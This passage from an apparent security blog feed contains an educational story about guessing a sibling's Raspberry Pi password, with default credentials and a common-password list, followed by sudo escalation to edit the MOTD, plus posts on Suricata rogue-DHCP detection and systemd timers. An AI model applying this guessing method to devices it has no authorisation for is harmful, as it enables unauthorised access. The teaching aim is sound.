<li><a href="https://blog.fox-it.com/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/">https://blog.fox-it.com/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/</a></li>
<li><a href="https://www.proofpoint.com/us/threat-insight/et-pro-ruleset">https://www.proofpoint.com/us/threat-insight/et-pro-ruleset</a></li>
</ul>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Daphne && Athos - E01:]]></title><description><![CDATA[In this first episode, we will learn some Infosec basics through the adventures of Daphne and her evil brother Athos.]]></description><link>http://www.cybermeng.info/daphne-athos-s01e01/</link><guid isPermaLink="false">61a39a01bb060c0001627106</guid><category><![CDATA[raspberry pi]]></category><category><![CDATA[rpi]]></category><category><![CDATA[sudo]]></category><category><![CDATA[motd]]></category><category><![CDATA[learning]]></category><category><![CDATA[infosec]]></category><category><![CDATA[CVE]]></category><category><![CDATA[CWE]]></category><category><![CDATA[bash]]></category><category><![CDATA[password guessing]]></category><dc:creator><![CDATA[Alessio Mangoni]]></dc:creator><pubDate>Sat, 18 Dec 2021 18:02:16 GMT</pubDate><media:content url="http://www.cybermeng.info/content/images/2022/01/horizon-7-configuration-01-1.jpg" medium="image"/><content:encoded><![CDATA[<!--kg-card-begin: html--><div style="text-align:center;">The fresh raspberry with a &quot;sudo&quot; flavour</div><!--kg-card-end: html--><hr><h1 id="contents">Contents</h1><ul><li><a href="#summary">Summary</a></li><li><a href="#what-you-will-learn">What you will learn</a></li><li><a href="#what-you-will-need">What you will need</a></li><li><a href="#scenario">Scenario</a></li><li><a href="#what-have-i-just-read">What have I just read?</a></li></ul><img src="http://www.cybermeng.info/content/images/2022/01/horizon-7-configuration-01-1.jpg" alt="Daphne &amp;&amp; Athos - E01:"><p></p><h3 id="summary">Summary</h3><!--kg-card-begin: markdown--><details>
    <summary>Synopsis / TL;DR [Spoiler Alert :D]</summary>
    <p>- Daphne buys a computer and she sets a password to use it</p>
    <p>- Athos manually guesses the password</p>
</details><!--kg-card-end: markdown--><h3 id="what-you-will-learn">What you will learn:</h3><ul><li>Infosec basics</li><li>CWE / CVE</li><li>Password guessing</li><li>GNU Linux terminal basics</li><li>Password setup on GNU/Linux</li><li>SUDO</li><li>The MOTD</li></ul><h3 id="what-you-will-need">What you will need</h3><ul><li>A computer</li><li>A GNU/Linux operating system</li></ul><h3 id="scenario">Scenario</h3><!--kg-card-begin: markdown--><p>Daphne, a young Infosec enthusiast buys a <a href="https://www.raspberrypi.com/products/">Raspberry Pi computer</a> to start learning about programming. Once she unboxes it, she is greeted by a black screen asking for a login.</p>
<!--kg-card-end: markdown--><figure class="kg-card kg-image-card"><img src="http://www.cybermeng.info/content/images/2021/12/Untitled.png" class="kg-image" alt="Daphne &amp;&amp; Athos - E01:" loading="lazy" width="541" height="259"></figure><!--kg-card-begin: markdown--><p>She has no idea of what&apos;s the username nor the password to use, but a quick look at the computer manual shows that the username is <code>pi</code> and the password is <code>raspberry</code>.</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><p>Daphne proceeds then to write <code>pi</code> as instructed and then she presses <kbd>Enter</kbd></p>
<p>Now the system asks for a password; she writes <code>raspberry</code> and once again she proceeds to press the <kbd>Enter</kbd> key.</p>
<!--kg-card-end: markdown--><figure class="kg-card kg-image-card"><img src="http://www.cybermeng.info/content/images/2021/12/Screenshot_2021-12-18_15-57-25.png" class="kg-image" alt="Daphne &amp;&amp; Athos - E01:" loading="lazy" width="583" height="201"></figure><p>Now the manual tells her that if she&apos;s seeing this, she was able to successfully login into her new computer. Now Daphne is advised by the manual to setup a new password.</p><!--kg-card-begin: markdown--><p>To achieve this, apparently she needs to use the &quot;passwd&quot; command so she writes the following into the terminal:</p>
<p><code>passwd</code></p>
<p>and she presses <kbd>Enter</kbd></p>
<!--kg-card-end: markdown--><p>The system now asks her for a new password. She has to write it twice, so that the system knows that there are no typos in her password.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="http://www.cybermeng.info/content/images/2021/12/Screenshot_2021-12-18_16-03-03.png" class="kg-image" alt="Daphne &amp;&amp; Athos - E01:" loading="lazy" width="318" height="140"><figcaption>that&apos;s all it takes to change a password</figcaption></figure><!--kg-card-begin: markdown--><p>She used a simple password so it will be easier to remember, something like <code>password1</code> should be fine.</p>
<!--kg-card-end: markdown--><p>&quot;That&apos;s enough for today&quot; she sighs while glancing at her wristwatch; she has other stuff to do so she&apos;ll be back on her computer another time.</p><p>She checks how to logout in the manual and leaves the computer on. Her brother, Athos, is home and she doesn&apos;t want to him to have access to her new computer!</p><!--kg-card-begin: markdown--><p>The manual explains that the <code>exit</code> command is just what she needs.<br>
Daphne writes it on the terminal and she presses <kbd>Enter</kbd> for the last time (at least today).<br>
Her terminal is back as it was at the beginning, before her first login. She goes on with her afternoon homeworks.</p>
<!--kg-card-end: markdown--><figure class="kg-card kg-image-card"><img src="http://www.cybermeng.info/content/images/2021/12/Untitled2-1.png" class="kg-image" alt="Daphne &amp;&amp; Athos - E01:" loading="lazy" width="524" height="393"></figure><p>Daphne doesn&apos;t know it, but Athos has been spying on her since she went home with this mysterious box. He knows it&apos;s a computer and he wants to access it. </p><p>He looks at the screen. &quot;Damn it&quot;, he says quietly. He recognises a GNU/Linux login screen and he knows a username / password combination is needed.</p><p>He quickly grabs the manual on the table near the keyboard and starts browsing it.</p><!--kg-card-begin: markdown--><p>Apparently it&apos;s a Raspberry Pi.<br>
Athos expression becomes an evil mix of satisfaction and disgust: &quot;It was all too easy&quot;.<br>
He already knows what to do: use a classic one, present in almost all Raspberry Pi, <code>pi</code> while the same goes for the password; he unboxed so many of these little computers and he remembers it by heart: <code>raspberry</code></p>
<!--kg-card-end: markdown--><p>Pressing keys on the keyboard without even looking at them he already thinks what to do once he has full control over the... </p><p>&quot;Damn it! Login failed! Did she change the pi password ?&quot; he mumbles to himself. </p><p>Looking at the manual, he sees that indeed the first step after the login is to change the root password. So now the question is: Which password Daphne set up for this system? </p><p>Athos doesn&apos;t have a lot of time. He quickly thinks about the easiest way under those conditions to access the system; he starts with the obvious: password guessing.</p><!--kg-card-begin: markdown--><p>He remembers some of the worst passwords by heart, since he&apos;s used the <a href="https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt">rockyou wordlist</a> so many times... Passwords like that are almost always worth trying:</p>
<blockquote>
<p>123456<br>
12345<br>
123456789<br>
password<br>
iloveyou<br>
princess<br>
1234567<br>
12345678<br>
abc123<br>
babygirl<br>
monkey<br>
lovely<br>
654321<br>
qwerty<br>
111111<br>
iloveu<br>
000000<br>
sunshine<br>
chocolate<br>
password1<br>
soccer<br>
....</p>
</blockquote>
<!--kg-card-end: markdown--><p>Failed login after failed login, he begins to lose hope.</p><!--kg-card-begin: markdown--><p>&quot;Damn, it&apos;s usually almost always one of those!&quot;<br>
He starts thinking about the keyboard layout: &quot;Is there any chance that I&apos;m not writing what I think I&apos;m writing?&quot; It&apos;s difficult to tell, since the password is not shown on the terminal when typed.<br>
To counter this, he starts writing the password in place of the username, as it&apos;s the only way to display on the screen what he&apos;s typing. Then, he deletes it, and puts <code>pi</code> again as the username, before typing under &quot;password&quot; the exact sequence of characters he just wrote.</p>
<p><code>login: qwerty</code></p>
<p>&quot;Nice&quot;, he says as he looks at the keyboard: a standard QWERTY, which confirms that indeed no weird keyboard layout is installed.<br>
At least not that pesky QWERTZ keyboard layout, otherwise his login would have been <code>qwertz</code>, even if the last key pressed was <key>y</key> .<br>
He repeats the same method with his mental list of weak passwords, until finally...</p>
<!--kg-card-end: markdown--><p>Login</p><!--kg-card-begin: markdown--><p><code>password1</code></p>
<!--kg-card-end: markdown--><figure class="kg-card kg-image-card"><img src="http://www.cybermeng.info/content/images/2021/12/Screenshot_2021-12-18_15-57-25-1.png" class="kg-image" alt="Daphne &amp;&amp; Athos - E01:" loading="lazy" width="583" height="201"></figure><p>&quot;Bingo!&quot; he thinks. He wants to impress his little sister and looks for a way to make her know that he was able to gain access to her computer.</p><!--kg-card-begin: markdown--><p>&quot;Uhmm... I know! The <a href="https://en.wikipedia.org/wiki/Motd_(Unix)">MOTD!</a>&quot;</p>
<p>He tries to set it up with his favourite text editor on the terminal: <a href="https://www.nano-editor.org/">nano</a><br>
A simple <code>nano /etc/motd</code> should be enough.<br>
While he thinks about what to write, he notices something strange</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><p><img src="http://www.cybermeng.info/content/images/2021/12/Screenshot_2021-12-18_16-43-56-4.png" alt="Daphne &amp;&amp; Athos - E01:" loading="lazy"></p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><p>Apparently the motd file is unwritable?<br>
He feels stupid, &quot;of course it is.. I&apos;m not <code>root</code> yet!&quot;</p>
<p>He quickly types <code>sudo su</code> since he knows that almost all Raspberry Pi Operating Systems have <code>sudo</code> installed and the <code>pi</code> user is allowed to perform super-user (or <code>su</code>) operations like, login as <code>root</code>.</p>
<!--kg-card-end: markdown--><figure class="kg-card kg-image-card"><img src="http://www.cybermeng.info/content/images/2021/12/Screenshot_2021-12-18_16-50-29-1.png" class="kg-image" alt="Daphne &amp;&amp; Athos - E01:" loading="lazy" width="320" height="102"></figure><!--kg-card-begin: markdown--><p>Just to be sure he also uses <code>whois</code> to check that indeed he&apos;s <code>root</code> now.</p>
<!--kg-card-end: markdown--><figure class="kg-card kg-image-card"><img src="http://www.cybermeng.info/content/images/2021/12/Screenshot_2021-12-18_16-52-36-1.png" class="kg-image" alt="Daphne &amp;&amp; Athos - E01:" loading="lazy" width="284" height="30"></figure><!--kg-card-begin: markdown--><p>He quickly writes a little message into the file <code>/etc/motd</code>... Something like:</p>
<blockquote>
<p>Hi Daphne, you should use a stronger password! :D<br>
Your big brother (watching you)</p>
<ul>
<li>Athos</li>
</ul>
</blockquote>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><p><img src="http://www.cybermeng.info/content/images/2021/12/Screenshot_2021-12-18_16-53-32-2.png" alt="Daphne &amp;&amp; Athos - E01:" loading="lazy"></p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><p>&quot;Yeah, this will do nicely&quot;, he thinks.<br>
&quot;With the MOTD setup, she will receive my message on the terminal next time she logs in&quot;, he chuckles.</p>
<!--kg-card-end: markdown--><p>Satisfied, he exits the terminal and leaves the computer on, with the login screen on display.</p><hr><h3 id="what-have-i-just-read">What have I just read?</h3><p>First of all, welcome!</p><p>If you&apos;re confused about everything you just read, this section is for you!</p><p>In this first episode of &quot;Daphne &amp;&amp; Athos&quot;, our lovely couple of siblings, we explore some basics of Infosec.</p><!--kg-card-begin: markdown--><p>Infosec , short for <a href="https://en.wikipedia.org/wiki/Information_security">&quot;Information Security&quot;</a> is the &quot;art&quot; of protecting data.</p>
<!--kg-card-end: markdown--><p>In this case, the data is everything stored on Daphne little computer that needs to be defended from Athos.</p><p>A simple measure of protection of course is a password: that&apos;s what Daphne types on her computer to &quot;login&quot;.</p><p>A Raspberry Pi is a convenient little computer that allows people around the world to learn coding, develop small projects or &#xA0;have a cheap personal computer and that&apos;s exactly Daphne&apos;s objective. </p><p>Being that convenient and widely adopted however, means also relax some security measures and the &quot;default password&quot; is one of them. </p><p>To be fair, even industrial systems and Enterprise appliances still have this bad habit and that&apos;s why we have <strong>CVE</strong>s.</p><!--kg-card-begin: markdown--><p>Basically, Infosec professionals all around the world collaborate to put vulnerabilities (like a default password) into a common public database, called C.V.E. or <a href="https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures">Common Vulnerabilities and Exposures</a>.<br>
Every &quot;CVE&quot; is represented by an unique Id composed by the disclosure year and a sequence number.<br>
Even for the default password on the Daphne&apos;s Raspberry Pi there&apos;s a CVE, specifically the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38759">CVE-2021-38759</a>.</p>
<!--kg-card-end: markdown--><p>But that&apos;s not what Athos uses to access Daphne&apos;s data; she followed the system recommendations on changing the default password right away. </p><!--kg-card-begin: markdown--><p>However, what Daphne did was to setup a very weak password like <code>password1</code> and Athos exploited this weekness.<br>
A weak password has no CVE since it&apos;s not specific to a system but is rather something common that happens pretty often and everywhere.<br>
That&apos;s why it has rather a <a href="https://en.wikipedia.org/wiki/Common_Weakness_Enumeration">CWE</a> assigned, or simpliy put a weakness which is defined in the <a href="https://cwe.mitre.org/data/definitions/521.html">CWE-521</a>.</p>
<!--kg-card-end: markdown--><p>What Athos did while trying to guess the Raspberry password from a widely-used list of &quot;bad passwords&quot; is actually a technique called <strong>&quot;Password guessing&quot;</strong>. This technique has been executed manually in our case by physically typing on a keyboard , but it could also be the result of an automated program and be called &quot;bruteforce&quot; when hundreds or thousands of passwords are tested every second.</p><p>Something we saw in the screenshots above and needs some explications is the GNU/Linux terminal.</p><p>Basically, this interaction method is what allows system administrators (and common people as well) around the world to perform tasks on their computer or servers.</p><p>Contrary to what most of us see on our computers every day, most of the operations are instead performed in the terminal, hidden by windows and buttons.</p><p>Some basic operations like password setup on GNU/Linux systems are pretty straightforward as Daphne experienced; some others require some attention as Athos saw when trying to modify the welcome banner or MOTD to prank Daphne.</p><p>That moment in the story touched also &quot;sudo&quot; or Super User DO, which is a program that allows an authorised user to perform operations usually requiring &quot;root&quot; privileges.</p><!--kg-card-begin: markdown--><p>In fact, to modify the <a href="https://en.wikipedia.org/wiki/Motd_(Unix)">MOTD</a> on a GNU/Linux system usually we need to be <code>root</code> and Athos achieved this by executing <code>su</code> which is a shortcut to login as <a href="https://en.wikipedia.org/wiki/Superuser">Super User</a> but prepended by <a href="https://en.wikipedia.org/wiki/Sudo">&quot;sudo&quot;</a> after seeing that his text editor was unable to write the MOTD configuration file (probably due to lack of permissions).</p>
<!--kg-card-end: markdown--><p>And that&apos;s basically it for this episode, if you liked it or if you have any question just let me know.</p><p>Stay tuned for more!</p>]]></content:encoded></item><item><title><![CDATA[Detecting rogue DHCP servers with Suricata]]></title><description><![CDATA[Recently I've been asked to detect rogue DHCP servers by a customer.. I never thought it could be such a nice and simple rabbit hole.]]></description><link>http://www.cybermeng.info/detecting-rogue-dhcp-servers-with-suricata/</link><guid isPermaLink="false">60f062aea8956a0001757fd2</guid><category><![CDATA[Suricata]]></category><category><![CDATA[DHCP]]></category><dc:creator><![CDATA[Alessio Mangoni]]></dc:creator><pubDate>Thu, 15 Jul 2021 18:20:52 GMT</pubDate><content:encoded><![CDATA[<p></p><!--kg-card-begin: markdown--><h2 id="whats-dhcp-and-why-it-might-be-rogue">What&apos;s DHCP and why it might be rogue?</h2>
<p>First of all, DHCP: basically a service that provides IP addresses.</p>
<p>When you connect your phone to your home wifi network, the device will most likely talk to your wifi access point to get an IP address.</p>
<p>Having an IP address is essential to become part of a network, but how do we ask for an IP address if we are not part of a network? Simple, we &quot;broadcast&quot;.</p>
<p>The device will broadcast a message that basically says</p>
<blockquote>
<p>&quot;hey! I&apos;m new here, I&apos;d like to be part of this network but I don&apos;t have an IP address yet, could anybody help me please?&quot;</p>
</blockquote>
<h2 id="dhcp-server-to-the-rescue">DHCP server to the rescue!</h2>
<p>At this point, a DHCP server literally listening for cries of help will interveen and broadcast itself</p>
<blockquote>
<p>&quot;Hey! Nice to meet you, here we talk to each other in this network and I can even tell you which IP address you could assign yourself from my pool of available addresses&quot;</p>
</blockquote>
<h2 id="big-powersbig-responsibilities">Big powers --&gt; Big responsibilities</h2>
<p>OK, so this DHCP server gives us an IP address, what&apos;s the big deal?</p>
<p>Well, the devil is in the details.. The DHCP server is so kind that it might give you a gateway IP address (which will be useful for your device to get out from the network..like reaching Internet), and DNS servers IP addresses which are other superheroes capable of telling us every IP address for a domain requested like: www.cybermeng.info ;)</p>
<p>Now imagine our DHCP superhero going rogue, first thing it would do is to give your device fake DNS servers IP addresses or a fake gateway IP address.</p>
<p>Why? Because with the help of an evil DNS server and/or gateway, all of the device traffic could be intercepted and modified.</p>
<h2 id="scary-but-can-we-detect-it">Scary, but can we detect it?</h2>
<p>Yes, thanks to an ever watching small mongoose called<br>
<a href="https://suricata.io/">&quot;Suricata&quot;</a><br>
<img src="http://www.cybermeng.info/content/images/2021/07/Logo-FINAL_Vertical_Color_Whitetext.png" alt="Logo-FINAL_Vertical_Color_Whitetext" loading="lazy"></p>
<p>which is a &quot;NIDS&quot; or Network Intrusion Detection System.<br>
Basically it listens on the network to packets that match a set of &quot;signature&quot; we feed it to and it alerts us when something matching one of those signatures appears in the network.</p>
<h2 id="ok-so-whats-a-suricata-signature">OK, so what&apos;s a Suricata signature?</h2>
<p>I&apos;m glad you asked ;)<br>
Basically, a signature (in this case to detect a rogue DHCP server) looks something like this:</p>
<p><code>alert udp !192.168.1.1 67 -&gt; any 68 (msg:&quot;detect rogue DHCP servers!&quot;; sid:123456789;)</code></p>
<p>basically we say to Suricata:</p>
<ul>
<li><code>alert</code> : I want to be alerted</li>
<li><code>udp</code> : when a UDP packet</li>
<li><code>!192.168.1.1</code> : that doesn&apos;t come from 192.168.1.1 (which is our &quot;good&quot; DHCP server)</li>
<li><code>-&gt;</code> : goes towards</li>
<li><code>any</code> : any IP address</li>
<li><code>68</code> : on destination port &quot;68&quot; (which is used by the DHCP protocol)</li>
</ul>
<p>Then we have a &quot;metadata&quot; section between parenthesis that basically indicates a description of the rule and an ID.</p>
<h2 id="yeah-ok-but-does-it-work">Yeah OK, but does it work?</h2>
<p><img src="http://www.cybermeng.info/content/images/2021/07/Screenshot_2021-07-15_19-30-19.png" alt="Screenshot_2021-07-15_19-30-19" loading="lazy"></p>
<p>yes, it works. According to the Suricata log, we were able to detect something broadcasting DHCP responses.</p>
<h2 id="i-just-see-random-characters">I just see random characters</h2>
<p>And you are right (kind of..) what you see is a <a href="https://en.wikipedia.org/wiki/JSON">JSON</a> file generated by Suricata that contains some informations but most importantly the &quot;payload&quot;:</p>
<p><img src="http://www.cybermeng.info/content/images/2021/07/Screenshot_2021-07-15_19-42-15.png" alt="Screenshot_2021-07-15_19-42-15" loading="lazy"></p>
<p>Which is a representation in <a href="https://en.wikipedia.org/wiki/Base64">Base64</a><br>
of the actual packet in the network.</p>
<h2 id="still-random-characters">Still random characters..</h2>
<p>Because to see what really happens we need to decode the Base64, something we can do thanks to a simple <code>base64 -d</code> command on Linux:</p>
<p><img src="http://www.cybermeng.info/content/images/2021/07/Screenshot_2021-07-15_19-47-46.png" alt="Screenshot_2021-07-15_19-47-46" loading="lazy"></p>
<p>aaaand it doesn&#xB4;t look better isn&apos;t it?</p>
<p>That&apos;s because our terminal tries to interpret the characters decoded and it&apos;s not really able to.</p>
<p>The soulution is to pass those characters to something able to show us in a terminal what they really are, something like <code>hexdump</code>:</p>
<p><img src="http://www.cybermeng.info/content/images/2021/07/Screenshot_2021-07-15_19-51-13.png" alt="Screenshot_2021-07-15_19-51-13" loading="lazy"></p>
<h2 id="nice-table-it-still-looks-like-nothing-to-me">Nice table, it still looks like nothing to me</h2>
<p>That&apos;s because this is how the DHCP protocol is transmitted in the network between devices.</p>
<p>How do we know that? Well, if it&apos;s a network protocol, there&apos;s an RFC for that: specifically the <a href="https://www.ietf.org/rfc/rfc2131.txt">RFC 2131</a></p>
<p>An RFC basically it&apos;s a very &quot;simple&quot; document that explains how a protocol works and its &quot;datagram&quot; or how to interpret those numbers we see in our table.</p>
<p>In this case, by looking at the datagram:</p>
<!--kg-card-end: markdown--><figure class="kg-card kg-gallery-card kg-width-wide"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="http://www.cybermeng.info/content/images/2021/07/Screenshot_2021-07-15_19-58-18-1.png" width="537" height="519" loading="lazy" alt></div><div class="kg-gallery-image"><img src="http://www.cybermeng.info/content/images/2021/07/Screenshot_2021-07-15_19-58-42.png" width="570" height="789" loading="lazy" alt></div></div></div></figure><!--kg-card-begin: markdown--><p>We can compare each one of these fields with what we obtained:</p>
<p><img src="http://www.cybermeng.info/content/images/2021/07/Screenshot_2021-07-15_20-27-44-1.png" alt="Screenshot_2021-07-15_20-27-44-1" loading="lazy"></p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><p>And we can for example determine which is the &quot;chaddr&quot; or <code>Client hardware address.</code> according to the RFC.</p>
<p>which looks to be:</p>
<p><code>00 11 32 52 64 9d 00 00 ...</code></p>
<p>Which should be a MAC address or basically a kind of digital fingerprint of a network device.</p>
<p>There&apos;s only one way to be sure:</p>
<p><img src="http://www.cybermeng.info/content/images/2021/07/Screenshot_2021-07-15_20-31-25.png" alt="Screenshot_2021-07-15_20-31-25" loading="lazy"></p>
<!--kg-card-end: markdown--><!--kg-card-begin: html--><div class="tenor-gif-embed" data-postid="5615801" data-share-method="host" data-width="100%" data-aspect-ratio="0.7407407407407407"><a href="https://tenor.com/view/yes-nerd-boo-yea-yeah-okay-gif-5615801">Yes Nerd GIF</a> from <a href="https://tenor.com/search/yes-gifs">Yes GIFs</a></div><script type="text/javascript" async src="https://tenor.com/embed.js"></script><!--kg-card-end: html-->]]></content:encoded></item><item><title><![CDATA[Systemd timers]]></title><description><![CDATA[little guide to use systemd timers]]></description><link>http://www.cybermeng.info/systemd-timers/</link><guid isPermaLink="false">605b7234a8956a0001757f7e</guid><category><![CDATA[systemd]]></category><category><![CDATA[timers]]></category><category><![CDATA[sysadmin]]></category><category><![CDATA[linux]]></category><dc:creator><![CDATA[Alessio Mangoni]]></dc:creator><pubDate>Wed, 24 Mar 2021 17:22:11 GMT</pubDate><content:encoded><![CDATA[<figure class="kg-card kg-image-card"><img src="http://www.cybermeng.info/content/images/2021/03/6ivYjETp.jpg" class="kg-image" alt loading="lazy" width="512" height="512"></figure><p><br>Here&apos;s something I didn&apos;t know..<br><br>I was experiencing some issues with a service on a box; </p><p>specifically, the service was in a failed status every time I rebooted the machine, but when restarted everything was fine.</p><p>Clearly the service needed a delay somehow but I didn&apos;t know how to achieve this with systemd.</p><p>Turns out that I just needed to create a &quot;myservice&quot;.timer file into the <strong>same folder</strong> containing my original service file &quot;myservice.service&quot;</p><!--kg-card-begin: markdown--><pre><code>[Unit]
Description=Run myservice after a little delay

[Timer]
OnBootSec=1min

[Install]
WantedBy=timers.target

</code></pre>
<!--kg-card-end: markdown--><p>and then, daemon-reload, disable the service and enable the timer:</p><!--kg-card-begin: markdown--><pre><code>~# systemctl daemon-reload
~# systemctl disable myservice.service
~# systemctl enable myservice.timer
</code></pre>
<!--kg-card-end: markdown--><p>and voil&#xE0;.</p>]]></content:encoded></item><item><title><![CDATA[How is crypto in Switzerland today]]></title><description><![CDATA[<!--kg-card-begin: html--><div class="nomics-ticker-widget" data-name="Bitcoin" data-base="BTC" data-quote="CHF"></div><script src="https://widget.nomics.com/embed.js"></script><!--kg-card-end: html-->]]></description><link>http://www.cybermeng.info/how-is-crypto-today/</link><guid isPermaLink="false">605b6ea5a8956a0001757f66</guid><category><![CDATA[crypto]]></category><category><![CDATA[bitcoin]]></category><dc:creator><![CDATA[Alessio Mangoni]]></dc:creator><pubDate>Wed, 24 Mar 2021 16:55:16 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: html--><div class="nomics-ticker-widget" data-name="Bitcoin" data-base="BTC" data-quote="CHF"></div><script src="https://widget.nomics.com/embed.js"></script><!--kg-card-end: html-->]]></content:encoded></item></channel></rss>